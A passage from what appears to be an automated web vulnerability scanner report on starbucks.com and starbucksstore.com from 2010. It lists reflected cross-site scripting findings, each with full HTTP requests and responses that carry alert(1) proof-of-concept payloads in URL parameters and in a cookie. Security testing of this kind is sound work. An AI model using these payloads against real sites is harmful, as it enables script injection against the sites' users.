This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/starbucks-red?17939"style%3d"x%3aexpression(alert(1))"3c77ff10018=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 21:02:25 GMT
Connection: close
Content-Length: 42231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-red?17939"style="x:expression(alert(1))"3c77ff10018=1"/>
...[SNIP]...

3.63. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40290"style%3d"x%3aexpression(alert(1))"07bc4a8acaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 40290"style="x:expression(alert(1))"07bc4a8acaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/community/youth-action?40290"style%3d"x%3aexpression(alert(1))"07bc4a8acaf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:29:53 GMT
Connection: close
Content-Length: 40428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/youth-action?40290"style="x:expression(alert(1))"07bc4a8acaf=1"/>
...[SNIP]...

3.64. http://www.starbucks.com/search [61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b88b9%20style%3dx%3aexpression(alert(1))%20df8091f7da5 was submitted in the 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc parameter. This input was echoed as b88b9 style=x:expression(alert(1)) df8091f7da5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27&61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc=1b88b9%20style%3dx%3aexpression(alert(1))%20df8091f7da5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=new0hf55b2avrbbgt3d0fz45; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:42:36 GMT
Content-Length: 33999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1b88b9 style=x:expression(alert(1)) df8091f7da5"/>
...[SNIP]...

3.65. http://www.starbucks.com/search [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97134"style%3d"x%3aexpression(alert(1))"eb377b674b2 was submitted in the keywords parameter. This input was echoed as 97134"style="x:expression(alert(1))"eb377b674b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%2797134"style%3d"x%3aexpression(alert(1))"eb377b674b2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:24:22 GMT
Content-Length: 33897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2"/>
...[SNIP]...

3.66. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fd7"style="x:expression(alert(1))"61073b145fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27&61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:39 GMT
Content-Length: 33815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1"/>
...[SNIP]...

3.67. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c69e5"style%3d"x%3aexpression(alert(1))"a6d88efaaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c69e5"style="x:expression(alert(1))"a6d88efaaa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /site-map?c69e5"style%3d"x%3aexpression(alert(1))"a6d88efaaa3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 21:10:05 GMT
Connection: close
Content-Length: 91702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/site-map?c69e5"style="x:expression(alert(1))"a6d88efaaa3=1"/>
...[SNIP]...

3.68. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5221e"style%3d"x%3aexpression(alert(1))"76d35535f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5221e"style="x:expression(alert(1))"76d35535f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store-locator?5221e"style%3d"x%3aexpression(alert(1))"76d35535f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:07:39 GMT
Connection: close
Content-Length: 39833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/store-locator?5221e"style="x:expression(alert(1))"76d35535f4=1"/>
...[SNIP]...

3.69. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"style%3d"x%3aexpression(alert(1))"ef582612840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68c58"style="x:expression(alert(1))"ef582612840 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /whats-new?68c58"style%3d"x%3aexpression(alert(1))"ef582612840=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:19 GMT
Connection: close
Content-Length: 44105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/whats-new?68c58"style="x:expression(alert(1))"ef582612840=1"/>
...[SNIP]...

3.70. http://www.starbucksstore.com/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94486</script><script>alert(1)</script>44201d6d60c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB94486</script><script>alert(1)</script>44201d6d60c;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:38 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTB94486</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>44201D6D60C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.71. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /GuestAssist/poweredbycooking.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7108a</script><script>alert(1)</script>5486b3db851 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GuestAssist/poweredbycooking.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB7108a</script><script>alert(1)</script>5486b3db851;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14241
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:42 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
weredbycooking.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/poweredbycooking.asp"
   var s_prop3="SBPTPAHP1SHTB7108A</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>5486B3DB851"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/poweredbycooking.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.72. http://www.starbucksstore.com/StarbucksCard/default.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /StarbucksCard/default.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902c6</script><script>alert(1)</script>c645460f9b8 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /StarbucksCard/default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB902c6</script><script>alert(1)</script>c645460f9b8;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19859
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:44 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
rbucks Card HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Card HomePage"
   var s_prop3="SBPTPAHP1SHTB902C6</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C645460F9B8"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbuckscard/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.73. http://www.starbucksstore.com/Tours/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /Tours/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eafb</script><script>alert(1)</script>892117031bf was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6eafb</script><script>alert(1)</script>892117031bf;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:58 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
e="Starbucks Tours Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Tours Page"
   var s_prop3="SBPTPAHP1SHTB6EAFB</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>892117031BF"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-tours/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaig
...[SNIP]...

3.74. http://www.starbucksstore.com/aff/adredir.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ee24</script><script>alert(1)</script>86a7be884f9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6ee24</script><script>alert(1)</script>86a7be884f9;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29740
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:50 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>
       <title>Coffee at Starbucks Store</title>
       <meta name="description" content="Shop for Coffee at Starbucks Store">
       <meta name="keywords" content="Coffee, Sta
...[SNIP]...
s_pageName="Coffee HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Coffee HomePage"
   var s_prop3="SBPTPAHP1SHTB6EE24</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>86A7BE884F9"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee/default.asp?CCAID=SBPTPAHP1SHCO&Redir=/coffee/"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables
...[SNIP]...

3.75. http://www.starbucksstore.com/coffee [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea760</script><script>alert(1)</script>6b70b264755 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

